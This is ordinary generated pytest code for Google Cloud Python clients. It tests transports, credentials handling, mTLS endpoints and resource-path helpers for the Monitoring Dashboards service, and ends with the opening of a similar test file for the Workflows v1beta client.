    assert ("x-goog-request-params", "dashboard.name=dashboard.name/value",) in kw[
        "metadata"
    ]
@pytest.mark.asyncio
async def test_update_dashboard_field_headers_async():
    """Async variant: verify ``dashboard.name`` is sent as a request-params header."""
    client = DashboardsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = dashboards_service.UpdateDashboardRequest()
    request.dashboard.name = "dashboard.name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(type(client.transport.update_dashboard), "__call__") as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(dashboard.Dashboard())
        await client.update_dashboard(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "dashboard.name=dashboard.name/value",) in kw[
        "metadata"
    ]
def test_credentials_transport_error():
    """Mutually exclusive client options must raise ValueError at construction."""
    # It is an error to provide credentials and a transport instance.
    transport = transports.DashboardsServiceGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    with pytest.raises(ValueError):
        client = DashboardsServiceClient(
            credentials=ga_credentials.AnonymousCredentials(), transport=transport,
        )

    # It is an error to provide a credentials file and a transport instance.
    transport = transports.DashboardsServiceGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    with pytest.raises(ValueError):
        client = DashboardsServiceClient(
            client_options={"credentials_file": "credentials.json"},
            transport=transport,
        )

    # It is an error to provide an api_key and a transport instance.
    transport = transports.DashboardsServiceGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    options = client_options.ClientOptions()
    options.api_key = "api_key"
    with pytest.raises(ValueError):
        client = DashboardsServiceClient(client_options=options, transport=transport,)

    # It is an error to provide an api_key and a credential.
    options = mock.Mock()
    options.api_key = "api_key"
    with pytest.raises(ValueError):
        client = DashboardsServiceClient(
            client_options=options, credentials=ga_credentials.AnonymousCredentials()
        )

    # It is an error to provide scopes and a transport instance.
    transport = transports.DashboardsServiceGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    with pytest.raises(ValueError):
        client = DashboardsServiceClient(
            client_options={"scopes": ["1", "2"]}, transport=transport,
        )
def test_transport_instance():
    """A client built from a pre-constructed transport exposes that same transport."""
    custom_transport = transports.DashboardsServiceGrpcTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    service_client = DashboardsServiceClient(transport=custom_transport)
    assert service_client.transport is custom_transport
def test_transport_get_channel():
    """Both gRPC transport flavors expose a usable ``grpc_channel``."""
    for transport_cls in (
        transports.DashboardsServiceGrpcTransport,
        transports.DashboardsServiceGrpcAsyncIOTransport,
    ):
        transport = transport_cls(
            credentials=ga_credentials.AnonymousCredentials(),
        )
        # The lazily-created channel must be truthy (i.e. actually built).
        assert transport.grpc_channel
@pytest.mark.parametrize(
    "transport_class",
    [
        transports.DashboardsServiceGrpcTransport,
        transports.DashboardsServiceGrpcAsyncIOTransport,
    ],
)
def test_transport_adc(transport_class):
    """Transports fall back to Application Default Credentials when none are given."""
    # Test default credentials are used if not provided.
    with mock.patch.object(google.auth, "default") as adc:
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport_class()
        adc.assert_called_once()
def test_transport_grpc_default():
    """When no transport is requested, the sync client defaults to gRPC."""
    default_client = DashboardsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    assert isinstance(
        default_client.transport, transports.DashboardsServiceGrpcTransport,
    )
def test_dashboards_service_base_transport_error():
    """Supplying both credentials and a credentials file is rejected."""
    # Passing both a credentials object and credentials_file should raise an error
    with pytest.raises(core_exceptions.DuplicateCredentialArgs):
        transport = transports.DashboardsServiceTransport(
            credentials=ga_credentials.AnonymousCredentials(),
            credentials_file="credentials.json",
        )
def test_dashboards_service_base_transport():
    """Every RPC on the abstract base transport raises NotImplementedError."""
    # Instantiate the base transport.
    with mock.patch(
        "google.cloud.monitoring_dashboard_v1.services.dashboards_service.transports.DashboardsServiceTransport.__init__"
    ) as Transport:
        Transport.return_value = None
        transport = transports.DashboardsServiceTransport(
            credentials=ga_credentials.AnonymousCredentials(),
        )

    # Every method on the transport should just blindly
    # raise NotImplementedError.
    methods = (
        "create_dashboard",
        "list_dashboards",
        "get_dashboard",
        "delete_dashboard",
        "update_dashboard",
    )
    for method in methods:
        with pytest.raises(NotImplementedError):
            getattr(transport, method)(request=object())

    # close() is likewise abstract on the base transport.
    with pytest.raises(NotImplementedError):
        transport.close()
def test_dashboards_service_base_transport_with_credentials_file():
    """The base transport loads credentials from a file with the expected scopes."""
    # Instantiate the base transport with a credentials file
    with mock.patch.object(
        google.auth, "load_credentials_from_file", autospec=True
    ) as load_creds, mock.patch(
        "google.cloud.monitoring_dashboard_v1.services.dashboards_service.transports.DashboardsServiceTransport._prep_wrapped_messages"
    ) as Transport:
        Transport.return_value = None
        load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport = transports.DashboardsServiceTransport(
            credentials_file="credentials.json", quota_project_id="octopus",
        )
        load_creds.assert_called_once_with(
            "credentials.json",
            scopes=None,
            default_scopes=(
                "https://www.googleapis.com/auth/cloud-platform",
                "https://www.googleapis.com/auth/monitoring",
                "https://www.googleapis.com/auth/monitoring.read",
                "https://www.googleapis.com/auth/monitoring.write",
            ),
            quota_project_id="octopus",
        )
def test_dashboards_service_base_transport_with_adc():
    """The base transport falls back to ADC when no credentials are supplied."""
    # Test the default credentials are used if credentials and credentials_file are None.
    with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch(
        "google.cloud.monitoring_dashboard_v1.services.dashboards_service.transports.DashboardsServiceTransport._prep_wrapped_messages"
    ) as Transport:
        Transport.return_value = None
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport = transports.DashboardsServiceTransport()
        adc.assert_called_once()
def test_dashboards_service_auth_adc():
    """The client requests ADC with the service's default scopes."""
    # If no credentials are provided, we should use ADC credentials.
    with mock.patch.object(google.auth, "default", autospec=True) as adc:
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        DashboardsServiceClient()
        adc.assert_called_once_with(
            scopes=None,
            default_scopes=(
                "https://www.googleapis.com/auth/cloud-platform",
                "https://www.googleapis.com/auth/monitoring",
                "https://www.googleapis.com/auth/monitoring.read",
                "https://www.googleapis.com/auth/monitoring.write",
            ),
            quota_project_id=None,
        )
@pytest.mark.parametrize(
    "transport_class",
    [
        transports.DashboardsServiceGrpcTransport,
        transports.DashboardsServiceGrpcAsyncIOTransport,
    ],
)
def test_dashboards_service_transport_auth_adc(transport_class):
    """Transports forward explicit scopes and quota project to ADC."""
    # If credentials and host are not provided, the transport class should use
    # ADC credentials.
    with mock.patch.object(google.auth, "default", autospec=True) as adc:
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport_class(quota_project_id="octopus", scopes=["1", "2"])
        adc.assert_called_once_with(
            scopes=["1", "2"],
            default_scopes=(
                "https://www.googleapis.com/auth/cloud-platform",
                "https://www.googleapis.com/auth/monitoring",
                "https://www.googleapis.com/auth/monitoring.read",
                "https://www.googleapis.com/auth/monitoring.write",
            ),
            quota_project_id="octopus",
        )
@pytest.mark.parametrize(
    "transport_class,grpc_helpers",
    [
        (transports.DashboardsServiceGrpcTransport, grpc_helpers),
        (transports.DashboardsServiceGrpcAsyncIOTransport, grpc_helpers_async),
    ],
)
def test_dashboards_service_transport_create_channel(transport_class, grpc_helpers):
    """Transports create their channel with the expected host, scopes, and options."""
    # If credentials and host are not provided, the transport class should use
    # ADC credentials.
    with mock.patch.object(
        google.auth, "default", autospec=True
    ) as adc, mock.patch.object(
        grpc_helpers, "create_channel", autospec=True
    ) as create_channel:
        creds = ga_credentials.AnonymousCredentials()
        adc.return_value = (creds, None)
        transport_class(quota_project_id="octopus", scopes=["1", "2"])

        create_channel.assert_called_with(
            "monitoring.googleapis.com:443",
            credentials=creds,
            credentials_file=None,
            quota_project_id="octopus",
            default_scopes=(
                "https://www.googleapis.com/auth/cloud-platform",
                "https://www.googleapis.com/auth/monitoring",
                "https://www.googleapis.com/auth/monitoring.read",
                "https://www.googleapis.com/auth/monitoring.write",
            ),
            scopes=["1", "2"],
            default_host="monitoring.googleapis.com",
            ssl_credentials=None,
            options=[
                ("grpc.max_send_message_length", -1),
                ("grpc.max_receive_message_length", -1),
            ],
        )
@pytest.mark.parametrize(
    "transport_class",
    [
        transports.DashboardsServiceGrpcTransport,
        transports.DashboardsServiceGrpcAsyncIOTransport,
    ],
)
def test_dashboards_service_grpc_transport_client_cert_source_for_mtls(transport_class):
    """mTLS channel setup: explicit ssl_channel_credentials takes precedence;
    otherwise the client_cert_source_for_mtls callback is used to build one."""
    cred = ga_credentials.AnonymousCredentials()
    # Check ssl_channel_credentials is used if provided.
    with mock.patch.object(transport_class, "create_channel") as mock_create_channel:
        mock_ssl_channel_creds = mock.Mock()
        transport_class(
            host="squid.clam.whelk",
            credentials=cred,
            ssl_channel_credentials=mock_ssl_channel_creds,
        )
        mock_create_channel.assert_called_once_with(
            "squid.clam.whelk:443",
            credentials=cred,
            credentials_file=None,
            scopes=None,
            ssl_credentials=mock_ssl_channel_creds,
            quota_project_id=None,
            options=[
                ("grpc.max_send_message_length", -1),
                ("grpc.max_receive_message_length", -1),
            ],
        )
    # Check if ssl_channel_credentials is not provided, then client_cert_source_for_mtls
    # is used.
    with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()):
        with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred:
            transport_class(
                credentials=cred,
                client_cert_source_for_mtls=client_cert_source_callback,
            )
            expected_cert, expected_key = client_cert_source_callback()
            mock_ssl_cred.assert_called_once_with(
                certificate_chain=expected_cert, private_key=expected_key
            )
def test_dashboards_service_host_no_port():
    """An api_endpoint without a port gets the default :443 appended."""
    options = client_options.ClientOptions(api_endpoint="monitoring.googleapis.com")
    client = DashboardsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), client_options=options,
    )
    assert client.transport._host == "monitoring.googleapis.com:443"
def test_dashboards_service_host_with_port():
    """An api_endpoint carrying an explicit port is used verbatim."""
    options = client_options.ClientOptions(api_endpoint="monitoring.googleapis.com:8000")
    client = DashboardsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), client_options=options,
    )
    assert client.transport._host == "monitoring.googleapis.com:8000"
def test_dashboards_service_grpc_transport_channel():
    """A caller-supplied gRPC channel must be adopted verbatim by the transport."""
    channel = grpc.secure_channel("http://localhost/", grpc.local_channel_credentials())
    # Check that channel is used if provided.
    transport = transports.DashboardsServiceGrpcTransport(
        host="squid.clam.whelk", channel=channel,
    )
    assert transport.grpc_channel == channel
    assert transport._host == "squid.clam.whelk:443"
    # Identity comparison per PEP 8 (fixes `== None`, flake8 E711).
    assert transport._ssl_channel_credentials is None
def test_dashboards_service_grpc_asyncio_transport_channel():
    """A caller-supplied asyncio gRPC channel must be adopted verbatim."""
    channel = aio.secure_channel("http://localhost/", grpc.local_channel_credentials())
    # Check that channel is used if provided.
    transport = transports.DashboardsServiceGrpcAsyncIOTransport(
        host="squid.clam.whelk", channel=channel,
    )
    assert transport.grpc_channel == channel
    assert transport._host == "squid.clam.whelk:443"
    # Identity comparison per PEP 8 (fixes `== None`, flake8 E711).
    assert transport._ssl_channel_credentials is None
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize(
    "transport_class",
    [
        transports.DashboardsServiceGrpcTransport,
        transports.DashboardsServiceGrpcAsyncIOTransport,
    ],
)
def test_dashboards_service_transport_channel_mtls_with_client_cert_source(
    transport_class,
):
    """Deprecated api_mtls_endpoint/client_cert_source path: the callback's
    cert/key must feed grpc.ssl_channel_credentials and the mTLS host is used.
    Emits a DeprecationWarning by design."""
    with mock.patch(
        "grpc.ssl_channel_credentials", autospec=True
    ) as grpc_ssl_channel_cred:
        with mock.patch.object(
            transport_class, "create_channel"
        ) as grpc_create_channel:
            mock_ssl_cred = mock.Mock()
            grpc_ssl_channel_cred.return_value = mock_ssl_cred
            mock_grpc_channel = mock.Mock()
            grpc_create_channel.return_value = mock_grpc_channel
            cred = ga_credentials.AnonymousCredentials()
            with pytest.warns(DeprecationWarning):
                with mock.patch.object(google.auth, "default") as adc:
                    adc.return_value = (cred, None)
                    transport = transport_class(
                        host="squid.clam.whelk",
                        api_mtls_endpoint="mtls.squid.clam.whelk",
                        client_cert_source=client_cert_source_callback,
                    )
                    adc.assert_called_once()
            grpc_ssl_channel_cred.assert_called_once_with(
                certificate_chain=b"cert bytes", private_key=b"key bytes"
            )
            grpc_create_channel.assert_called_once_with(
                "mtls.squid.clam.whelk:443",
                credentials=cred,
                credentials_file=None,
                scopes=None,
                ssl_credentials=mock_ssl_cred,
                quota_project_id=None,
                options=[
                    ("grpc.max_send_message_length", -1),
                    ("grpc.max_receive_message_length", -1),
                ],
            )
            assert transport.grpc_channel == mock_grpc_channel
            assert transport._ssl_channel_credentials == mock_ssl_cred
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize(
    "transport_class",
    [
        transports.DashboardsServiceGrpcTransport,
        transports.DashboardsServiceGrpcAsyncIOTransport,
    ],
)
def test_dashboards_service_transport_channel_mtls_with_adc(transport_class):
    """Deprecated api_mtls_endpoint path with ADC-provided client certs: the
    SslCredentials from google.auth must be used for the mTLS channel.
    Emits a DeprecationWarning by design."""
    mock_ssl_cred = mock.Mock()
    with mock.patch.multiple(
        "google.auth.transport.grpc.SslCredentials",
        __init__=mock.Mock(return_value=None),
        ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
    ):
        with mock.patch.object(
            transport_class, "create_channel"
        ) as grpc_create_channel:
            mock_grpc_channel = mock.Mock()
            grpc_create_channel.return_value = mock_grpc_channel
            mock_cred = mock.Mock()
            with pytest.warns(DeprecationWarning):
                transport = transport_class(
                    host="squid.clam.whelk",
                    credentials=mock_cred,
                    api_mtls_endpoint="mtls.squid.clam.whelk",
                    client_cert_source=None,
                )
            grpc_create_channel.assert_called_once_with(
                "mtls.squid.clam.whelk:443",
                credentials=mock_cred,
                credentials_file=None,
                scopes=None,
                ssl_credentials=mock_ssl_cred,
                quota_project_id=None,
                options=[
                    ("grpc.max_send_message_length", -1),
                    ("grpc.max_receive_message_length", -1),
                ],
            )
            assert transport.grpc_channel == mock_grpc_channel
def test_alert_policy_path():
    """alert_policy_path builds the canonical alert-policy resource name."""
    actual = DashboardsServiceClient.alert_policy_path("squid", "clam")
    assert actual == "projects/squid/alertPolicies/clam"
def test_parse_alert_policy_path():
    """parse_alert_policy_path is the inverse of alert_policy_path."""
    expected = {"project": "whelk", "alert_policy": "octopus"}
    path = DashboardsServiceClient.alert_policy_path(**expected)
    # Round-trip: building then parsing must recover the components.
    assert DashboardsServiceClient.parse_alert_policy_path(path) == expected
def test_dashboard_path():
    """dashboard_path builds the canonical dashboard resource name."""
    actual = DashboardsServiceClient.dashboard_path("oyster", "nudibranch")
    assert actual == "projects/oyster/dashboards/nudibranch"
def test_parse_dashboard_path():
    """parse_dashboard_path is the inverse of dashboard_path."""
    expected = {"project": "cuttlefish", "dashboard": "mussel"}
    path = DashboardsServiceClient.dashboard_path(**expected)
    # Round-trip: building then parsing must recover the components.
    assert DashboardsServiceClient.parse_dashboard_path(path) == expected
def test_common_billing_account_path():
    """common_billing_account_path builds a billingAccounts/ resource name."""
    actual = DashboardsServiceClient.common_billing_account_path("winkle")
    assert actual == "billingAccounts/winkle"
def test_parse_common_billing_account_path():
    """parse_common_billing_account_path inverts common_billing_account_path."""
    expected = {"billing_account": "nautilus"}
    path = DashboardsServiceClient.common_billing_account_path(**expected)
    # Round-trip: building then parsing must recover the components.
    assert DashboardsServiceClient.parse_common_billing_account_path(path) == expected
def test_common_folder_path():
    """common_folder_path builds a folders/ resource name."""
    assert DashboardsServiceClient.common_folder_path("scallop") == "folders/scallop"
def test_parse_common_folder_path():
    """parse_common_folder_path inverts common_folder_path."""
    expected = {"folder": "abalone"}
    path = DashboardsServiceClient.common_folder_path(**expected)
    # Round-trip: building then parsing must recover the components.
    assert DashboardsServiceClient.parse_common_folder_path(path) == expected
def test_common_organization_path():
    """common_organization_path builds an organizations/ resource name."""
    actual = DashboardsServiceClient.common_organization_path("squid")
    assert actual == "organizations/squid"
def test_parse_common_organization_path():
    """parse_common_organization_path inverts common_organization_path."""
    expected = {"organization": "clam"}
    path = DashboardsServiceClient.common_organization_path(**expected)
    # Round-trip: building then parsing must recover the components.
    assert DashboardsServiceClient.parse_common_organization_path(path) == expected
def test_common_project_path():
    """common_project_path builds a projects/ resource name."""
    assert DashboardsServiceClient.common_project_path("whelk") == "projects/whelk"
def test_parse_common_project_path():
    """parse_common_project_path inverts common_project_path."""
    expected = {"project": "octopus"}
    path = DashboardsServiceClient.common_project_path(**expected)
    # Round-trip: building then parsing must recover the components.
    assert DashboardsServiceClient.parse_common_project_path(path) == expected
def test_common_location_path():
    """common_location_path builds a projects/.../locations/... resource name."""
    actual = DashboardsServiceClient.common_location_path("oyster", "nudibranch")
    assert actual == "projects/oyster/locations/nudibranch"
def test_parse_common_location_path():
    """parse_common_location_path inverts common_location_path."""
    expected = {"project": "cuttlefish", "location": "mussel"}
    path = DashboardsServiceClient.common_location_path(**expected)
    # Round-trip: building then parsing must recover the components.
    assert DashboardsServiceClient.parse_common_location_path(path) == expected
def test_client_with_default_client_info():
    """Both the client constructor and a bare transport must forward the
    caller's client_info to _prep_wrapped_messages."""
    client_info = gapic_v1.client_info.ClientInfo()
    with mock.patch.object(
        transports.DashboardsServiceTransport, "_prep_wrapped_messages"
    ) as prep:
        client = DashboardsServiceClient(
            credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
        )
        prep.assert_called_once_with(client_info)
    with mock.patch.object(
        transports.DashboardsServiceTransport, "_prep_wrapped_messages"
    ) as prep:
        transport_class = DashboardsServiceClient.get_transport_class()
        transport = transport_class(
            credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
        )
        prep.assert_called_once_with(client_info)
@pytest.mark.asyncio
async def test_transport_close_async():
    """Using the async client as an async context manager must close the
    underlying gRPC channel exactly once, on exit."""
    client = DashboardsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc_asyncio",
    )
    with mock.patch.object(
        type(getattr(client.transport, "grpc_channel")), "close"
    ) as close:
        async with client:
            close.assert_not_called()
        close.assert_called_once()
def test_transport_close():
    """Using the client as a context manager must close the transport channel
    exactly once, on exit."""
    # Renamed from `transports` so the `transports` module import is not
    # shadowed inside this function.
    transport_channels = {
        "grpc": "_grpc_channel",
    }
    for transport, close_name in transport_channels.items():
        client = DashboardsServiceClient(
            credentials=ga_credentials.AnonymousCredentials(), transport=transport
        )
        with mock.patch.object(
            type(getattr(client.transport, close_name)), "close"
        ) as close:
            with client:
                close.assert_not_called()
            close.assert_called_once()
def test_client_ctx():
    """The client context manager must delegate close() to its transport."""
    # Renamed from `transports` so the `transports` module import is not
    # shadowed inside this function.
    transport_names = [
        "grpc",
    ]
    for transport in transport_names:
        client = DashboardsServiceClient(
            credentials=ga_credentials.AnonymousCredentials(), transport=transport
        )
        # Test client calls underlying transport.
        with mock.patch.object(type(client.transport), "close") as close:
            close.assert_not_called()
            with client:
                pass
            close.assert_called()
@pytest.mark.parametrize(
    "client_class,transport_class",
    [
        (DashboardsServiceClient, transports.DashboardsServiceGrpcTransport),
        (
            DashboardsServiceAsyncClient,
            transports.DashboardsServiceGrpcAsyncIOTransport,
        ),
    ],
)
def test_api_key_credentials(client_class, transport_class):
    """client_options.api_key must be exchanged for API-key credentials and
    passed to the transport in place of regular credentials."""
    with mock.patch.object(
        google.auth._default, "get_api_key_credentials", create=True
    ) as get_api_key_credentials:
        mock_cred = mock.Mock()
        get_api_key_credentials.return_value = mock_cred
        options = client_options.ClientOptions()
        options.api_key = "api_key"
        with mock.patch.object(transport_class, "__init__") as patched:
            patched.return_value = None
            client = client_class(client_options=options)
            patched.assert_called_once_with(
                credentials=mock_cred,
                credentials_file=None,
                host=client.DEFAULT_ENDPOINT,
                scopes=None,
                client_cert_source_for_mtls=None,
                quota_project_id=None,
                client_info=transports.base.DEFAULT_CLIENT_INFO,
                always_use_jwt_access=True,
            )
| googleapis/python-monitoring-dashboards | tests/unit/gapic/dashboard_v1/test_dashboards_service.py | Python | apache-2.0 | 83,643 | [
"Octopus"
] | 05ee69ab6f4929b010e4fb625f5dae4a368d2abe056bb906c22ece23aeb37180 |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import future
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import operation
from google.api_core import operation_async # type: ignore
from google.api_core import operations_v1
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.workflows_v1beta.services.workflows import WorkflowsAsyncClient
from google.cloud.workflows_v1beta.services.workflows import WorkflowsClient
from google.cloud.workflows_v1beta.services.workflows import pagers
from google.cloud.workflows_v1beta.services.workflows import transports
from google.cloud.workflows_v1beta.types import workflows
from google.longrunning import operations_pb2
from google.oauth2 import service_account
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
import google.auth
def client_cert_source_callback():
    """Return a dummy (certificate, key) byte pair used as a client cert
    source throughout these tests."""
    return (b"cert bytes", b"key bytes")
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
    """Return "foo.googleapis.com" when the client's default endpoint is a
    localhost one, else the client's own DEFAULT_ENDPOINT.

    Used to fake a non-localhost endpoint so mTLS endpoint derivation can be
    exercised in tests.
    """
    if "localhost" in client.DEFAULT_ENDPOINT:
        return "foo.googleapis.com"
    return client.DEFAULT_ENDPOINT
def test__get_default_mtls_endpoint():
    """_get_default_mtls_endpoint rewrites *.googleapis.com hosts to their
    mtls variants, is idempotent, and leaves other hosts (and None) alone."""
    cases = {
        None: None,
        "example.googleapis.com": "example.mtls.googleapis.com",
        "example.mtls.googleapis.com": "example.mtls.googleapis.com",
        "example.sandbox.googleapis.com": "example.mtls.sandbox.googleapis.com",
        "example.mtls.sandbox.googleapis.com": "example.mtls.sandbox.googleapis.com",
        "api.example.com": "api.example.com",
    }
    for given, expected in cases.items():
        assert WorkflowsClient._get_default_mtls_endpoint(given) == expected
@pytest.mark.parametrize("client_class", [WorkflowsClient, WorkflowsAsyncClient,])
def test_workflows_client_from_service_account_info(client_class):
    """from_service_account_info must hand the parsed credentials to the
    transport and target the workflows endpoint."""
    creds = ga_credentials.AnonymousCredentials()
    with mock.patch.object(
        service_account.Credentials, "from_service_account_info"
    ) as factory:
        factory.return_value = creds
        client = client_class.from_service_account_info({"valid": True})
        assert isinstance(client, client_class)
        assert client.transport._credentials == creds
        assert client.transport._host == "workflows.googleapis.com:443"
@pytest.mark.parametrize(
    "transport_class,transport_name",
    [
        (transports.WorkflowsGrpcTransport, "grpc"),
        (transports.WorkflowsGrpcAsyncIOTransport, "grpc_asyncio"),
    ],
)
def test_workflows_client_service_account_always_use_jwt(
    transport_class, transport_name
):
    """Self-signed JWT must be enabled iff always_use_jwt_access=True."""
    for enabled in (True, False):
        with mock.patch.object(
            service_account.Credentials, "with_always_use_jwt_access", create=True
        ) as use_jwt:
            creds = service_account.Credentials(None, None, None)
            transport = transport_class(
                credentials=creds, always_use_jwt_access=enabled
            )
            if enabled:
                use_jwt.assert_called_once_with(True)
            else:
                use_jwt.assert_not_called()
@pytest.mark.parametrize("client_class", [WorkflowsClient, WorkflowsAsyncClient,])
def test_workflows_client_from_service_account_file(client_class):
    """Both from_service_account_file and its _json alias must hand the loaded
    credentials to the transport and target the workflows endpoint."""
    creds = ga_credentials.AnonymousCredentials()
    with mock.patch.object(
        service_account.Credentials, "from_service_account_file"
    ) as factory:
        factory.return_value = creds
        for constructor in (
            client_class.from_service_account_file,
            client_class.from_service_account_json,
        ):
            client = constructor("dummy/file/path.json")
            assert isinstance(client, client_class)
            assert client.transport._credentials == creds
        assert client.transport._host == "workflows.googleapis.com:443"
def test_workflows_client_get_transport_class():
    """The default transport is gRPC, and "grpc" resolves to the gRPC class."""
    default_transport = WorkflowsClient.get_transport_class()
    assert default_transport in [transports.WorkflowsGrpcTransport]
    named_transport = WorkflowsClient.get_transport_class("grpc")
    assert named_transport == transports.WorkflowsGrpcTransport
@pytest.mark.parametrize(
    "client_class,transport_class,transport_name",
    [
        (WorkflowsClient, transports.WorkflowsGrpcTransport, "grpc"),
        (
            WorkflowsAsyncClient,
            transports.WorkflowsGrpcAsyncIOTransport,
            "grpc_asyncio",
        ),
    ],
)
@mock.patch.object(
    WorkflowsClient, "DEFAULT_ENDPOINT", modify_default_endpoint(WorkflowsClient)
)
@mock.patch.object(
    WorkflowsAsyncClient,
    "DEFAULT_ENDPOINT",
    modify_default_endpoint(WorkflowsAsyncClient),
)
def test_workflows_client_client_options(client_class, transport_class, transport_name):
    """Exercise client construction across the client_options / env-var matrix:
    explicit channel, api_endpoint, GOOGLE_API_USE_MTLS_ENDPOINT values
    ("never"/"always"/unsupported), GOOGLE_API_USE_CLIENT_CERTIFICATE
    unsupported, and quota_project_id."""
    # Check that if channel is provided we won't create a new one.
    with mock.patch.object(WorkflowsClient, "get_transport_class") as gtc:
        transport = transport_class(credentials=ga_credentials.AnonymousCredentials())
        client = client_class(transport=transport)
        gtc.assert_not_called()
    # Check that if channel is provided via str we will create a new one.
    with mock.patch.object(WorkflowsClient, "get_transport_class") as gtc:
        client = client_class(transport=transport_name)
        gtc.assert_called()
    # Check the case api_endpoint is provided.
    options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
    with mock.patch.object(transport_class, "__init__") as patched:
        patched.return_value = None
        client = client_class(transport=transport_name, client_options=options)
        patched.assert_called_once_with(
            credentials=None,
            credentials_file=None,
            host="squid.clam.whelk",
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id=None,
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
    # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
    # "never".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
        with mock.patch.object(transport_class, "__init__") as patched:
            patched.return_value = None
            client = client_class(transport=transport_name)
            patched.assert_called_once_with(
                credentials=None,
                credentials_file=None,
                host=client.DEFAULT_ENDPOINT,
                scopes=None,
                client_cert_source_for_mtls=None,
                quota_project_id=None,
                client_info=transports.base.DEFAULT_CLIENT_INFO,
                always_use_jwt_access=True,
            )
    # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
    # "always".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
        with mock.patch.object(transport_class, "__init__") as patched:
            patched.return_value = None
            client = client_class(transport=transport_name)
            patched.assert_called_once_with(
                credentials=None,
                credentials_file=None,
                host=client.DEFAULT_MTLS_ENDPOINT,
                scopes=None,
                client_cert_source_for_mtls=None,
                quota_project_id=None,
                client_info=transports.base.DEFAULT_CLIENT_INFO,
                always_use_jwt_access=True,
            )
    # Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
    # unsupported value.
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
        with pytest.raises(MutualTLSChannelError):
            client = client_class(transport=transport_name)
    # Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
    with mock.patch.dict(
        os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}
    ):
        with pytest.raises(ValueError):
            client = client_class(transport=transport_name)
    # Check the case quota_project_id is provided
    options = client_options.ClientOptions(quota_project_id="octopus")
    with mock.patch.object(transport_class, "__init__") as patched:
        patched.return_value = None
        client = client_class(client_options=options, transport=transport_name)
        patched.assert_called_once_with(
            credentials=None,
            credentials_file=None,
            host=client.DEFAULT_ENDPOINT,
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id="octopus",
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
@pytest.mark.parametrize(
    "client_class,transport_class,transport_name,use_client_cert_env",
    [
        (WorkflowsClient, transports.WorkflowsGrpcTransport, "grpc", "true"),
        (
            WorkflowsAsyncClient,
            transports.WorkflowsGrpcAsyncIOTransport,
            "grpc_asyncio",
            "true",
        ),
        (WorkflowsClient, transports.WorkflowsGrpcTransport, "grpc", "false"),
        (
            WorkflowsAsyncClient,
            transports.WorkflowsGrpcAsyncIOTransport,
            "grpc_asyncio",
            "false",
        ),
    ],
)
@mock.patch.object(
    WorkflowsClient, "DEFAULT_ENDPOINT", modify_default_endpoint(WorkflowsClient)
)
@mock.patch.object(
    WorkflowsAsyncClient,
